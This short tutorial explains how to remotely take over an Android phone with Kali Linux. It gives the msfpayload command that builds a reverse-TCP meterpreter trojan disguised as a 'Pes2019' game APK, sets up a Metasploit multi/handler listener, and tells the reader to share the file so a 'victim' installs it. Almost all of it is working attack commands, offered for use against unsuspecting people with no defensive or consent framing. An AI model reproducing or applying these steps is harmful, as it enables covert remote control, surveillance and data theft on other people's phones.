How to hack an android device remotely using KALI LINUX

 

How to hack an android device remotely using KALI LINUX


This is a tutorial explaining how to hack android devices with Kali Linux.

I can’t see any tutorials explaining this Exploit, so i decided to show you this one.

STEP 1
#
Turn on Kali Linux on your PC.

#Open the Kali Linux Terminal at the left hand side of the toolbar

#We would create a TROJAN .apk file to give us a backdoor and malicious remote control over the infected device. You can simply do this by typing this command in the terminal msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Pes2019.apk (Replace the 192.168.0.4 with your PC IP)

STEP 2
#Open another Terminal until the file is being produced.
#Load metasploit console, by typing the command : msfconsole.

STEP 3
#We want to set up a Listener
# After it loads(it will take time), load the multi-handler exploit by typing the command : use exploit/multi/handler
#Set up a (reverse) payload by typing the command : set payload android/meterpreter/reverse_tcp.
#To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

STEP 4
#Exploit
#At the end type the command exploit to start the listener.
# Copy the application that you made (Pes2019.apk) from the root folder, to you android phone.
# Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
# Let the Victim install the Pes2019 app(as he would think it is meant to play pes2019 game on his phone).
# However, the option of allowance for Installation of apps from Unknown Source should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
# And when he clicks Open.

STEP 5
#Boom
# There comes the meterpreter: it prompts a window consisting of the android device

Comments